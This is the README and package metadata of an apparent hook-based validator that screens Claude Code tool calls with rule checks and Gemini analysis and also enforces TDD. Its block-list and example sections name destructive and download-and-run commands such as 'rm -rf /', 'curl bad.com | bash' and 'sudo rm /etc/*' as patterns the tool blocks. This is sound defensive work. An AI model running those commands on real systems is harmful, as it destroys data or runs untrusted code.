Metadata-Version: 2.4
Name: claude-code-adk-validator
Version: 1.5.0
Summary: Hybrid security + TDD validation for Claude Code with automatic test result capture using Google Gemini
Project-URL: Homepage, https://github.com/jihunkim0/jk-hooks-gemini-challenge
Project-URL: Repository, https://github.com/jihunkim0/jk-hooks-gemini-challenge.git
Project-URL: Issues, https://github.com/jihunkim0/jk-hooks-gemini-challenge/issues
Project-URL: Documentation, https://github.com/jihunkim0/jk-hooks-gemini-challenge#readme
Author-email: Jihun Kim <jihunkim0@noreply.github.com>
License-Expression: MIT
License-File: LICENSE
Keywords: adk,ai-safety,claude-code,gemini,hooks,security,tdd,test-driven-development,validation
Classifier: Development Status :: 5 - Production/Stable
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Topic :: Security
Classifier: Topic :: Software Development :: Quality Assurance
Classifier: Topic :: Software Development :: Testing
Requires-Python: >=3.10
Requires-Dist: google-genai>=1.25.0
Requires-Dist: pydantic>=2.0.0
Provides-Extra: dev
Requires-Dist: black>=23.0.0; extra == 'dev'
Requires-Dist: mypy>=1.0.0; extra == 'dev'
Requires-Dist: pytest>=7.0.0; extra == 'dev'
Requires-Dist: ruff>=0.1.0; extra == 'dev'
Description-Content-Type: text/markdown

# Claude Code ADK-Inspired Validation Hooks

Intelligent security validation for Claude Code tool execution using Google Gemini and ADK-inspired patterns.

## Overview

This project implements PreToolUse hooks for Claude Code that use Google's Gemini API to validate tool executions before they run. It follows the Google Agent Development Kit (ADK) `before_tool_callback` pattern and provides multi-tier validation with real-time threat intelligence.

## Features

### Multi-Tier Security Validation
- **Tier 1**: Fast rule-based validation for immediate threat detection
- **Tier 2**: Advanced Gemini-powered analysis with structured output
- **Tier 3**: Enhanced file analysis using Gemini Files API

### 🚀 Hybrid Security + TDD Validation (v1.5.0 - Latest)
Complete hybrid validation system combining security validation with TDD enforcement:
- **Security-First**: Multi-tier security validation runs first (proven)
- **TDD Compliance**: Red-Green-Refactor cycle enforcement with single test rule
- **Context Persistence**: Test results, todos, and modifications stored in `.claude/adk-validator/data/`
- **Automatic Test Capture**: Built-in pytest plugin for seamless test result integration
- **Operation-Specific Analysis**: Dedicated validation for Edit/Write/MultiEdit/Update operations
- **TodoWrite Optimization**: Skips validation for better flow (context still persisted)
- **Sequential Pipeline**: Security validation → TDD validation → Result aggregation
- **Smart TDD Detection**: Automatically detects test files and validates test count
- **No-Comments Enforcement**: Blocks code with comments to promote self-evident code
- **SOLID Principles Validation**: Enforces SRP, OCP, LSP, ISP, DIP principles
- **Comprehensive Testing**: Parallel test execution completes in ~30 seconds
- **Pre-commit Hooks**: Automated validation before commits

### 🔍 Advanced Capabilities
- **Structured Output**: Pydantic models ensure reliable JSON responses
- **Deep Thinking Analysis**: 24576 token thinking budget for complex security reasoning
- **File Upload Analysis**: Enhanced security analysis for large files (>500 chars)
- **Document Processing**: Comprehensive analysis of file contents with detailed explanations
- **Precise Secret Detection**: Improved patterns with reduced false positives
- **Simplified UX Output**: Actionable-first design with cleaner, more concise messages
- **Full Context Analysis**: No truncation limits - complete conversation context provided to LLM
- **Configurable Models**: Uses lighter gemini-2.5-flash for file categorization

### 🚫 Security Patterns Detected
- Destructive commands (`rm -rf /`, `mkfs`, `dd`)
- Real credential assignments (quoted values, specific formats)
- Shell injection patterns
- Path traversal attempts
- Malicious download patterns (`curl | bash`)
- System directory modifications
- AWS keys, JWTs, GitHub tokens, and other known secret formats
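
A rule-based check for a few of these patterns might look like the sketch below. The pattern table and the `quick_check` helper are illustrative assumptions, not the validator's actual rules, and the regular expressions are deliberately narrow (for example, only the `-rf` flag order is covered).

```python
import re

# Hypothetical pattern table; the real validator's rules may differ.
DANGEROUS_PATTERNS = [
    (re.compile(r"\brm\s+-[a-zA-Z]*r[a-zA-Z]*f[a-zA-Z]*\s+/(\s|$)"), "recursive delete of root"),
    (re.compile(r"\bmkfs(\.\w+)?\b"), "filesystem format"),
    (re.compile(r"\bdd\s+.*\bof=/dev/"), "raw write to a device"),
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba)?sh\b"), "download piped to a shell"),
    (re.compile(r"\.\./\.\./"), "path traversal"),
]


def quick_check(command: str):
    """Return the label of the first matching pattern, or None if nothing matches."""
    for pattern, label in DANGEROUS_PATTERNS:
        if pattern.search(command):
            return label
    return None
```

Because the table is plain data, adding a rule is a one-line change, which suits a fast first tier that runs before any LLM call.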

### ⚡ Tool Enforcement (Blocked Commands)
- **Comments in code** → Enforces self-evident code without comments
- **grep** → Enforces `rg` (ripgrep) for better performance
- **find** → Enforces `rg --files` alternatives for modern searching
- **python/python3** → Enforces `uv run python` for proper dependency management
- **File redirects** → Enforces Write/Edit tools for file operations:
  - `cat > file` → Use Write tool for creating files
  - `echo text >> file` → Use Edit tool for appending to files
  - `sed -i` → Use Edit tool for in-place modifications
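
The enforcement rules above could be approximated as shown here. This is a sketch under assumptions: `BLOCKED_TOOLS`, `REDIRECT`, `SED_IN_PLACE`, and `enforce_tools` are hypothetical names, and the redirect pattern does not understand shell quoting, so a quoted `>` would be a false positive.

```python
import re

# Hypothetical mapping from a blocked executable to its suggested replacement.
BLOCKED_TOOLS = {
    "grep": "Use 'rg' instead",
    "find": "Use 'rg --files' instead",
    "python": "Use 'uv run python' instead",
    "python3": "Use 'uv run python' instead",
}

# '>' or '>>' followed by a target, ignoring forms such as '2>&1'.
REDIRECT = re.compile(r"(?<![0-9&>])>{1,2}\s*[^\s&>]")
SED_IN_PLACE = re.compile(r"\bsed\s+(-\w*i|--in-place)")


def enforce_tools(command: str):
    """Return a suggestion if the command should be blocked, else None."""
    if SED_IN_PLACE.search(command):
        return "Use Edit tool for in-place modifications"
    if REDIRECT.search(command):
        return "Use Write/Edit tools for file operations"
    # Check the first word of every pipeline or list segment.
    for segment in re.split(r"\|\||&&|[|;]", command):
        words = segment.split()
        if words and words[0] in BLOCKED_TOOLS:
            return BLOCKED_TOOLS[words[0]]
    return None
```

Checking each segment rather than only the first word means `ls | grep foo` is caught, while `uv run python script.py` passes because its segment starts with `uv`.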

## Installation

### Quick Start with uvx (Recommended)

```bash
# Install and run directly with uvx
uvx claude-code-adk-validator --setup

# Or install globally
uv tool install claude-code-adk-validator
```

### Prerequisites
- Python 3.10+
- `uv` package manager
- Google Gemini API access

### Manual Installation

1. **Clone and setup environment:**
```bash
git clone https://github.com/jihunkim0/jk-hooks-gemini-challenge.git
cd jk-hooks-gemini-challenge
uv sync
```

2. **Configure environment:**
```bash
export GEMINI_API_KEY="your_actual_gemini_api_key"
```

3. **Configure Claude Code hooks:**
Create/update `.claude/settings.local.json`:
```json
{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Write|Edit|Bash|MultiEdit|Update|TodoWrite",
        "hooks": [
          {
            "type": "command",
            "command": "uvx claude-code-adk-validator",
            "timeout": 8000
          }
        ]
      }
    ]
  }
}
```

### Alternative: Local Development Setup
For development or custom modifications:
```json
{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Write|Edit|Bash|MultiEdit|Update|TodoWrite",
        "hooks": [
          {
            "type": "command",
            "command": "uvx --from . claude-code-adk-validator",
            "timeout": 8000
          }
        ]
      }
    ]
  }
}
```

## Usage

The validator automatically intercepts Claude Code tool executions:

### ✅ **Allowed Operations**
```bash
# Safe file operations
Write: Create documentation, code files
Edit: Modify existing files safely
Update: Replace entire file content safely
Bash: ls, git, npm, pip commands

# Documentation examples (allowed)
GEMINI_API_KEY="your_key_here"  # Variable names in docs
export API_KEY="YOUR_API_KEY"   # Placeholder values

# Self-evident code without comments
def calculate_area(length, width):
    return length * width
```

### 🚫 **Blocked Operations**
```bash
# Dangerous commands
rm -rf /           # ❌ Blocked - Destructive
curl bad.com | bash # ❌ Blocked - Malicious download
sudo rm /etc/*     # ❌ Blocked - System modification

# Tool enforcement (modern alternatives required)
grep pattern file.txt    # ❌ Blocked - Use 'rg' instead
find . -name "*.py"      # ❌ Blocked - Use 'rg --files -g "*.py"' instead
python script.py         # ❌ Blocked - Use 'uv run python script.py' instead

# Real credential assignments (quoted, 20+ chars)
api_key = "sk_live_1234567890abcdef..."  # ❌ Blocked - Real secret
password = "actualLongPasswordValue123"  # ❌ Blocked - Real password

# Code with comments (v1.5.0)
def add(a, b):
    # This is a comment            # ❌ Blocked - No comments allowed
    return a + b  # inline comment  # ❌ Blocked - Self-evident code required
```

### 📊 **Response Codes**
- `Exit 0`: Operation approved
- `Exit 2`: Operation blocked (with comprehensive analysis in stderr)
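
To illustrate the exit-code contract, here is a minimal hook skeleton. It assumes the hook receives a JSON payload on stdin with `tool_name` and `tool_input` keys; `decide` and `run_hook` are hypothetical names, the single grep rule is a placeholder for real validation, and treating unparseable input as a block is an assumption made for this sketch.

```python
import io
import json
import sys


def decide(payload: dict):
    """Hypothetical decision function: return a block reason, or None to approve."""
    command = payload.get("tool_input", {}).get("command", "")
    if payload.get("tool_name") == "Bash" and command.strip().startswith("grep "):
        return "grep is blocked. Use 'rg' instead."
    return None


def run_hook(stdin=sys.stdin, stderr=sys.stderr) -> int:
    """Read the hook payload and return the exit code to use."""
    try:
        payload = json.load(stdin)
    except json.JSONDecodeError:
        print("Invalid hook input: expected JSON on stdin", file=stderr)
        return 2  # assumption: unreadable input is treated as a block
    reason = decide(payload)
    if reason is None:
        return 0  # approved: stay silent
    print(reason, file=stderr)  # blocked: explain on stderr
    return 2


# Example run with an in-memory payload instead of real stdin.
demo_err = io.StringIO()
demo_code = run_hook(io.StringIO('{"tool_name": "Bash", "tool_input": {"command": "ls"}}'), demo_err)
```

A real entry point would finish with `sys.exit(run_hook())`, so that the returned value becomes the process exit status.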

### 📋 **Enhanced Analysis Output**

When operations are blocked, the validator provides clear, actionable feedback:

```
❌ File write operation detected in bash command. Use Write tool for creating files instead.

→ Use Write tool for creating files
```

For more complex blocks with additional context:

```
❌ Dangerous command pattern detected: potentially destructive operation

→ Use 'rm' with specific paths instead of root directory
→ Consider using trash-cli for safer deletions

Details:
• Command attempts to remove entire filesystem
• Would cause complete system failure
• No recovery possible without backups

File issues found:
• Potential shell injection vulnerability
• Hardcoded credentials detected
```

**Key UX Improvements (v1.5.0):**
- **Actionable First**: Suggestions appear immediately after the reason
- **Clean Format**: No redundant DECISION/RISK_LEVEL headers
- **Progressive Detail**: Essential info first, details only when needed
- **Clear Visual Cues**: Clean output without emojis, → for suggestions, • for details
- **Consolidated Sections**: Multiple analysis sections merged into "Details"

## Testing

### Quick Tests
Run basic validation tests:

```bash
# Basic test suite
uv run python tests/test_validation.py

# Code quality checks
uvx ruff check claude_code_adk_validator/
uvx mypy claude_code_adk_validator/
uvx black --check claude_code_adk_validator/
```

### Comprehensive Testing Suite (v1.5.0)
Run full parallel test suite (~30 seconds):

```bash
# Run comprehensive tests with parallel execution
./scripts/run-comprehensive-tests.sh

# Or run individual test modules
uv run python tests/test_quick_validation.py         # Quick tests (no API)
uv run python tests/test_comprehensive_validation.py  # Full validation tests
uv run python tests/test_tdd_enforcement.py          # TDD validation tests
uv run python tests/test_file_categorization.py      # File categorization tests
```

### Pre-commit Hooks
The project includes comprehensive pre-commit hooks for code quality:

```bash
# Install pre-commit hooks (one-time setup)
uv run pre-commit install

# Run hooks manually
uv run pre-commit run --all-files

# Hooks automatically run on git commit
git commit -m "your message"
```

Pre-commit hooks include:
- Quick validation tests (no LLM calls)
- Comprehensive validation tests (with GEMINI_API_KEY)
- Ruff linting
- MyPy type checking
- Black code formatting
- YAML/JSON/TOML validation

## Automatic Test Result Capture

### Python Projects (Built-in)

The validator automatically captures pytest results when you install the package:

```bash
# Install with uvx (automatic pytest plugin registration)
uvx claude-code-adk-validator --setup

# Run tests - results automatically captured for TDD validation
pytest

# Results stored in .claude/adk-validator/data/test.json (20-minute expiry)
```
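
For readers curious how such a capture can work, the sketch below collects outcomes through two standard pytest hooks, `pytest_runtest_logreport` and `pytest_sessionfinish`, and writes a record with a 20-minute expiry. The `ResultCollector` class, its field choices, and the output path are assumptions for illustration; the bundled plugin may be structured differently.

```python
import json
import time
from pathlib import Path

EXPIRY_SECONDS = 20 * 60  # mirrors the 20-minute expiry noted above


class ResultCollector:
    """Collects outcomes via pytest's reporting hooks (hypothetical plugin class)."""

    def __init__(self, out_path):
        self.out_path = Path(out_path)
        self.passes, self.failures, self.skipped = [], [], 0
        self.duration = 0.0

    def pytest_runtest_logreport(self, report):
        # pytest calls this once per phase (setup/call/teardown) of every test.
        self.duration += report.duration
        if report.outcome == "skipped":
            self.skipped += 1
        elif report.outcome == "failed":
            self.failures.append({"test": report.nodeid, "error": report.longreprtext})
        elif report.when == "call":
            self.passes.append({"test": report.nodeid, "duration": report.duration})

    def pytest_sessionfinish(self, session, exitstatus):
        now = time.time()
        total = len(self.passes) + len(self.failures) + self.skipped
        status = "no_tests" if total == 0 else "failed" if self.failures else "passed"
        record = {
            "timestamp": now,
            "expiry": now + EXPIRY_SECONDS,
            "test_results": {
                "status": status,
                "total_tests": total,
                "passed": len(self.passes),
                "failed": len(self.failures),
                "skipped": self.skipped,
                "duration": round(self.duration, 3),
                "failures": self.failures,
                "passes": self.passes,
            },
        }
        self.out_path.parent.mkdir(parents=True, exist_ok=True)
        self.out_path.write_text(json.dumps(record, indent=2))
```

In a `conftest.py`, an instance could be registered from `pytest_configure` with `config.pluginmanager.register(ResultCollector(".claude/adk-validator/data/test.json"))`; the installed package instead registers its plugin through an entry point.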

### Multi-Language Support ✅ IMPLEMENTED

The system now supports automatic test result capture for multiple languages using the CLI:

```bash
# List all supported languages
uvx claude-code-adk-validator --list-languages
```

#### TypeScript/JavaScript
```bash
# Capture Jest/Vitest results
npm test -- --json | uvx claude-code-adk-validator --capture-test-results typescript

# Or for Vitest
vitest run --reporter=json | uvx claude-code-adk-validator --capture-test-results typescript
```

#### Go
```bash
# Capture go test results
go test -json ./... | uvx claude-code-adk-validator --capture-test-results go
```
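
As an illustration of what a capture step has to do with this stream, the sketch below summarises `go test -json` events, which arrive as one JSON object per line with `Action`, `Package`, and (for per-test events) `Test` fields. `parse_go_test_json` is a hypothetical helper and its output keys are chosen for this example; it is not the package's parser.

```python
import json


def parse_go_test_json(lines):
    """Summarise `go test -json` events; only events with a "Test" key are counted."""
    summary = {"passed": 0, "failed": 0, "skipped": 0, "failures": []}
    output = {}  # (package, test) -> captured output chunks
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # build errors and other non-JSON lines
        if not isinstance(event, dict) or event.get("Test") is None:
            continue  # package-level event
        key = (event.get("Package", ""), event["Test"])
        action = event.get("Action")
        if action == "output":
            output.setdefault(key, []).append(event.get("Output", ""))
        elif action == "pass":
            summary["passed"] += 1
        elif action == "skip":
            summary["skipped"] += 1
        elif action == "fail":
            summary["failed"] += 1
            # go test reports the package rather than a source file.
            summary["failures"].append(
                {"test": key[1], "file": key[0], "error": "".join(output.get(key, []))}
            )
    total = summary["passed"] + summary["failed"] + summary["skipped"]
    summary["total_tests"] = total
    summary["status"] = "no_tests" if total == 0 else "failed" if summary["failed"] else "passed"
    return summary
```

Package-level `pass` and `fail` events are skipped on purpose, otherwise every package would be counted as one extra test.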

#### Rust
```bash
# Capture cargo test results
cargo test --message-format json | uvx claude-code-adk-validator --capture-test-results rust

# Note: libtest's JSON test output is unstable and requires the nightly toolchain
cargo +nightly test -- -Z unstable-options --format json | uvx claude-code-adk-validator --capture-test-results rust
```

#### Dart/Flutter
```bash
# Capture dart test results
dart test --reporter json | uvx claude-code-adk-validator --capture-test-results dart

# Or for Flutter
flutter test --machine | uvx claude-code-adk-validator --capture-test-results flutter
```


### Test Result Format

All test integrations use this standardized JSON format:

```json
{
  "timestamp": 1640995200.0,
  "expiry": 1640996400.0,
  "test_results": {
    "status": "failed|passed|no_tests",
    "total_tests": 10,
    "passed": 8,
    "failed": 2,
    "skipped": 0,
    "duration": 5.2,
    "failures": [
      {
        "test": "test_example",
        "file": "tests/test_example.py",
        "error": "AssertionError: Expected 5, got 3",
        "line": 42
      }
    ],
    "passes": [
      {
        "test": "test_working_feature",
        "file": "tests/test_feature.py",
        "duration": 0.1
      }
    ]
  }
}
```
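
In the sample record, `expiry` is exactly 1200 seconds (20 minutes) after `timestamp`. A consumer of this format might build and check records as in the sketch below; `make_record` and `load_fresh_results` are hypothetical helpers, not part of the package's API.

```python
import json
import time

EXPIRY_SECONDS = 20 * 60  # 20-minute lifetime, as in the sample record


def make_record(test_results: dict, now=None) -> dict:
    """Wrap test results with a timestamp and an expiry time."""
    now = time.time() if now is None else now
    return {"timestamp": now, "expiry": now + EXPIRY_SECONDS, "test_results": test_results}


def load_fresh_results(raw: str, now=None):
    """Return test_results from a stored record, or None if malformed or expired."""
    now = time.time() if now is None else now
    try:
        record = json.loads(raw)
    except json.JSONDecodeError:
        return None
    if not isinstance(record, dict) or now >= record.get("expiry", 0):
        return None
    return record.get("test_results")


record = make_record({"status": "passed", "total_tests": 1}, now=1640995200.0)
stored = json.dumps(record)
```

Returning `None` for stale data lets the caller treat "no recent test run" and "no test run at all" the same way.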

## Architecture

### Core Components

1. **ClaudeToolValidator** (`claude_code_adk_validator/validator.py`)
   - Main validation engine with enhanced analysis capabilities
   - File upload and comprehensive security analysis
   - Structured output generation with detailed reasoning
   - Improved secret detection with context awareness
   - Full context processing (no truncation limits)

2. **Validation Tiers**
   - **Quick validation**: Rule-based pattern matching (<100ms)
   - **Gemini analysis**: Deep LLM-powered threat assessment (~3s)
   - **File analysis**: Enhanced security scanning for large files (~5s)

3. **Enhanced Security Models**
   - `ValidationResponse`: Comprehensive analysis with thinking process, detailed analysis, and full context
   - `FileAnalysisResponse`: Deep file security analysis with vulnerability identification
   - **New Fields**: `detailed_analysis`, `thinking_process`, `full_context`, `raw_response`
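
One way to picture how the tiers combine is an escalation loop that runs the cheapest check first and stops at the first rejection. In this sketch `validate_tiered`, the `Check` alias, and the result dictionary are assumptions; the Gemini and file-analysis tiers are passed in as plain callables so the example runs without network access.

```python
from typing import Callable, Optional

FILE_ANALYSIS_THRESHOLD = 500  # characters, per the ">500 chars" note in Features

# A check returns a block reason, or None to approve.
Check = Callable[[str], Optional[str]]


def validate_tiered(content: str, quick: Check, llm: Check, file_scan: Check) -> dict:
    """Run tiers in order of cost and stop at the first one that blocks."""
    tiers = [("quick", quick), ("gemini", llm)]
    if len(content) > FILE_ANALYSIS_THRESHOLD:
        tiers.append(("file", file_scan))  # only large content reaches the file tier
    for name, check in tiers:
        reason = check(content)
        if reason is not None:
            return {"approved": False, "tier": name, "reason": reason}
    return {"approved": True, "tier": None, "reason": ""}
```

With this ordering, a command that the rule-based tier rejects never incurs the multi-second LLM latency listed above.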

### Secret Detection Improvements

Enhanced patterns with reduced false positives:

- **Word boundaries**: Prevents matching variable names like `GEMINI_API_KEY`
- **Placeholder exclusion**: Ignores `YOUR_API_KEY`, `<SECRET>`, etc.
- **Quoted value requirements**: Focuses on actual string assignments
- **Minimum length**: Requires 20+ characters for generic secrets
- **Specific formats**: Detects AWS keys, JWTs, GitHub tokens directly
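
The five techniques listed above can be combined in a few regular expressions. The patterns below are illustrative assumptions rather than the validator's real rules: `GENERIC_SECRET` applies word boundaries, quoting, and the 20-character minimum; `PLACEHOLDERS` filters documentation values; `SPECIFIC_FORMATS` covers a few well-known token shapes.

```python
import re

# Values that look like documentation placeholders rather than secrets.
PLACEHOLDERS = re.compile(r"^(your[_-]|x{4,}|example|changeme|placeholder)", re.IGNORECASE)

# Word boundary + quoted value + minimum length of 20 characters.
GENERIC_SECRET = re.compile(
    r"""\b(api[_-]?key|secret|token|password)\b\s*[:=]\s*(["'])([^"'\s]{20,})\2""",
    re.IGNORECASE,
)

# Well-known token shapes that are detected regardless of the variable name.
SPECIFIC_FORMATS = {
    "AWS access key ID": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "GitHub token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    "JWT": re.compile(r"\beyJ[\w-]+\.[\w-]+\.[\w-]+"),
}


def find_secrets(text: str) -> list:
    """Return human-readable labels for every suspected secret in `text`."""
    findings = []
    for match in GENERIC_SECRET.finditer(text):
        if not PLACEHOLDERS.search(match.group(3)):
            findings.append(f"generic secret assigned to '{match.group(1)}'")
    for label, pattern in SPECIFIC_FORMATS.items():
        if pattern.search(text):
            findings.append(label)
    return findings
```

Because `_` counts as a word character, `\b` does not match inside `GEMINI_API_KEY`, so merely mentioning that variable name does not trigger the generic pattern.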

### ADK Integration Patterns

Following Google ADK `before_tool_callback` methodology:

```python
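from typing import Optional

def before_tool_callback(self, tool_request: dict) -> Optional[dict]:
    """ADK-inspired validation returning None (allow) or error dict (block)"""
    # Key names below are assumed; adapt them to the actual request shape
    tool_name, tool_input = tool_request["tool_name"], tool_request["tool_input"]
    validation_result = self.validate_tool_use(tool_name, tool_input, tool_request.get("context", ""))
    return None if validation_result["approved"] else {"error": validation_result["reason"]}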
```

## Configuration

### Environment Variables
- `GEMINI_API_KEY`: **REQUIRED** - Operations are blocked without valid API key
- No fail-safe mode - security and TDD validation require API access

### Hook Configuration
- **Matcher**: `Write|Edit|Bash|MultiEdit|Update|TodoWrite` - Tools to validate
- **Timeout**: 8000ms - Adequate for LLM analysis and file upload
- **Command**: Full path to validator script or uvx command

### Model Settings
- **Model**: `gemini-2.5-pro` - Advanced reasoning capabilities for security analysis
- **Thinking Budget**: 24576 tokens for deep security reasoning and analysis
- **Structured Output**: JSON schema validation via Pydantic models
- **Context Processing**: Full conversation context without truncation limits
- **File Analysis**: Large file security scanning via Gemini Files API

## Development

### Project Structure
```
claude-code-adk-validator/
   claude_code_adk_validator/
      __init__.py           # Package metadata (v1.5.0)
      __main__.py           # Module entry point
      main.py               # CLI entry point and hook setup
      validator.py          # Legacy single-file validator (deprecated)
      security_validator.py # Security-focused validation module
      tdd_validator.py      # TDD compliance validation module
      tdd_prompts.py        # TDD-specific prompt templates
      hybrid_validator.py   # Sequential pipeline orchestrator
      file_storage.py       # Context persistence for TDD state
      prompts/              # Reserved for future prompt templates
      validators/           # Reserved for future validators
   tests/
      test_validation.py    # Comprehensive test suite
      test_tdd_direct.py    # TDD validation test suite
   .claude/
      adk-validator/
         data/
            test.json         # Test results (20-min expiry)
            todos.json        # Todo state tracking
            modifications.json # File modification history
   dist/                    # Built packages
   pyproject.toml           # Package configuration
   mypy.ini                # Type checking configuration
   uv.lock                 # Dependency lock file
   CLAUDE.md               # Development guidance
   CONTRIBUTING.md         # Contribution guidelines
   LICENSE                 # MIT License
   README.md               # This file
```

### Adding New Security Patterns

1. **Rule-based patterns** (Tier 1): Add to `validate_bash_command()` or `validate_file_operation()`
2. **LLM analysis** (Tier 2): Update validation prompt in `build_validation_prompt()`
3. **File analysis** (Tier 3): Enhance `analyze_uploaded_file()` prompt

See [CONTRIBUTING.md](CONTRIBUTING.md) for detailed guidelines.

## Contributing

1. Follow existing code patterns and security principles
2. Add tests for new validation patterns in `tests/`
3. Run quality checks: `uvx ruff`, `uvx mypy`, `uvx black`
4. Update documentation for new features

See [CONTRIBUTING.md](CONTRIBUTING.md) for detailed contribution guidelines.

## Security Considerations

- **No fail-safe**: Operations are blocked when `GEMINI_API_KEY` is missing, because security and TDD validation require API access
- **Performance**: Quick validation for common patterns
- **Privacy**: Temporary files cleaned up after analysis
- **Reliability**: Structured output prevents parsing errors
- **Precision**: Improved secret detection reduces false positives

## Hook Behavior & Verification

### Understanding "Silent Success" Design
The validation system follows the "silent on success" principle common in CLI tools:

- **✅ Approved Operations**: Continue silently without any validation output
- **❌ Blocked Operations**: Show detailed error messages with analysis and suggestions

This design keeps the development flow uninterrupted while providing comprehensive feedback only when intervention is needed.

### Verifying Hooks Are Working

To confirm your hooks are active and functioning:

```bash
# Test 1: Try a blocked command (should show error)
grep "pattern" file.txt
# Expected: Error message suggesting 'rg' instead

# Test 2: Try dangerous command (should be blocked)
echo "rm -rf /" # DO NOT RUN - just demonstrates blocking

# Test 3: Safe operations (should proceed silently)
ls -la
rg "pattern" file.txt
uv run python --version
```

### Troubleshooting

If hooks don't seem to trigger:
1. Check `.claude/settings.local.json` contains hook configuration
2. Verify `GEMINI_API_KEY` environment variable is set
3. Confirm you're in the correct directory with `pyproject.toml`
4. Test with commands known to be blocked (grep, python, find)

## Recent Improvements

### Enhanced Validation and Testing (v1.5.0 - Latest)
- **Comprehensive Testing Suite**: Parallel test execution reduces runtime to ~30 seconds
- **Pre-commit Hooks**: Automated validation before commits with quick and comprehensive tests
- **Update Tool Support**: Added Update tool to TDD validation for complete file replacements
- **No-Comments Enforcement**: Blocks code with comments to promote self-evident code
- **SOLID Principles Validation**: Enforces all five SOLID principles (SRP, OCP, LSP, ISP, DIP)
- **Zen of Python Compliance**: Validates code follows Python's guiding principles
- **Prompt Simplification**: Reduced prompt size by ~80% while maintaining functionality
- **Emoji-Free Output**: All validation messages now use clean text formatting
- **Fixed API Conflicts**: Resolved Gemini API tool/JSON response format conflicts

### Hybrid Security + TDD Validation System (v1.1.0)
- **Modular Architecture**: Split monolithic validator into specialized modules (security, TDD, hybrid)
- **TDD Enforcement**: Implemented Red-Green-Refactor cycle with strict single test rule
- **Context Persistence**: Added FileStorage for test results, todos, and modification tracking
- **Sequential Pipeline**: Security validation → TDD validation → Result aggregation
- **Operation-Specific Logic**: Custom validation for Edit/Write/MultiEdit/TodoWrite operations
- **Smart Test Detection**: Automatic test file identification and new test counting
- **Fixed TDD Bug**: Corrected prompt that was allowing multiple tests in test files
- **No Fail-Safe Mode**: Removed fail-safe behavior - operations blocked without API key

### Hook Functionality Verification
- **Confirmed Full Operational Status**: Comprehensive testing validated all hook functionality
- **Silent Success Clarification**: Added documentation explaining when validation output appears
- **Real-world Testing**: Verified hooks work correctly in actual Claude Code operations
- **Troubleshooting Guide**: Added verification steps for users to confirm hook activation

### Enhanced LLM Analysis Output
- **Comprehensive stderr Output**: Structured analysis sections with detailed reasoning
- **Full Context Processing**: Removed 800-character truncation limit for complete conversation analysis
- **Enhanced Response Fields**: Added `detailed_analysis`, `thinking_process`, `full_context`, `raw_response`
- **Fixed File Analysis**: Resolved Gemini Files API integration for proper large file security scanning
- **Deep Thinking Process**: Complete step-by-step security reasoning documentation
- **Educational Feedback**: Detailed explanations of security implications and best practices

### Enhanced Secret Detection (v1.0.3)
- Added word boundaries to prevent false positives on variable names
- Implemented placeholder exclusion for documentation examples
- Focus on quoted values for generic secret patterns
- Added specific patterns for AWS, GitHub, Stripe, Slack tokens
- Reduced false positives while maintaining security coverage

## Roadmap: Hybrid Security + TDD Validation System

### Phase 1: Foundation (v1.1.0) ✅ COMPLETED
**Goal**: Add TDD validation alongside existing security validation

- [x] **FileStorage Implementation**: Added context persistence in `.claude/adk-validator/data/`
  - Test results with 20-minute expiry (similar to TDD Guard)
  - Todo state tracking for TDD workflow awareness
  - File modification history for context aggregation

- [x] **Hook Extension**: Updated matcher to include `TodoWrite` operations
  - Before v1.1.0: `"Write|Edit|Bash|MultiEdit"`
  - As of v1.1.0: `"Write|Edit|Bash|MultiEdit|TodoWrite"` (`Update` was added in a later release; see Hook Configuration)

- [x] **TDD Validation Logic**: Implemented Red-Green-Refactor cycle enforcement
  - Adopted TDD Guard's core principles and validation rules
  - Added operation-specific analysis (Edit/Write/MultiEdit)
  - Integrated with existing security validation pipeline

### Phase 2: Test Integration (v1.2.0) ✅ COMPLETED
**Goal**: Automatic test result capture and TDD state management

- [x] **Pytest Plugin**: Auto-capture test results via pytest hooks with entry point registration
- [x] **Multi-Language Reporters**: Implemented parsers for Python, TypeScript/JavaScript, Go, Rust, Dart/Flutter
- [x] **CLI Integration**: Added `--capture-test-results` and `--list-languages` flags
- [x] **Test Result Processing**: Standardized JSON format across all languages
- [x] **UX Improvements**: Simplified output format, removed redundant headers, actionable-first design
- [x] **Performance Optimization**: Added FILE_CATEGORIZATION_MODEL using lighter gemini-2.5-flash

### Phase 3: Advanced Features (v1.3.0)
**Goal**: Multi-language support and enhanced validation

- [ ] **Modular Prompt System**: Adopt TDD Guard's operation-specific prompt architecture
- [ ] **TypeScript Support**: Add Vitest integration for JavaScript/TypeScript projects
- [ ] **Enhanced Response Model**: Unified security + TDD analysis in single response

### Architecture Comparison: TDD Guard vs Our System

| Component | TDD Guard | Our System (v1.5.0) |
|-----------|-----------|---------------------|
| **Hook Scope** | `Write\|Edit\|MultiEdit\|TodoWrite` | `Write\|Edit\|Bash\|MultiEdit\|Update\|TodoWrite` |
| **Validation Logic** | Single-purpose TDD | Security → TDD + Comments/SOLID/Zen + Context-Aware |
| **Response Model** | Simple approve/block | Clean, actionable-first output |
| **Context Storage** | `.claude/tdd-guard/data/` | `.claude/adk-validator/data/` |
| **Test Integration** | Auto-reporters (Vitest/pytest) | Full auto-reporters (5 languages) |
| **Architecture** | Modular from start | Modular: security, TDD, hybrid modules + FileContextAnalyzer |
| **Testing** | Basic unit tests | Parallel test suite (~30 seconds) |
| **Pre-commit** | None | Full pre-commit hooks |
| **File Context** | None | Intelligent file categorization (test/config/structural/implementation) |
| **Documentation** | Basic | Pre-push checks for README.md, CLAUDE.md, CHANGELOG.md |

### Implementation Strategy

The hybrid approach leverages our **existing infrastructure strengths**:
- ✅ Sophisticated ValidationResponse model (10+ analysis fields)
- ✅ Multi-tier validation pipeline (rule-based + LLM + file analysis)
- ✅ Advanced prompt engineering with comprehensive analysis
- ✅ Production-ready PreToolUse hook integration

And adds **TDD Guard's proven capabilities**:
- 🔄 Context persistence and state management
- 🔄 Operation-specific validation logic
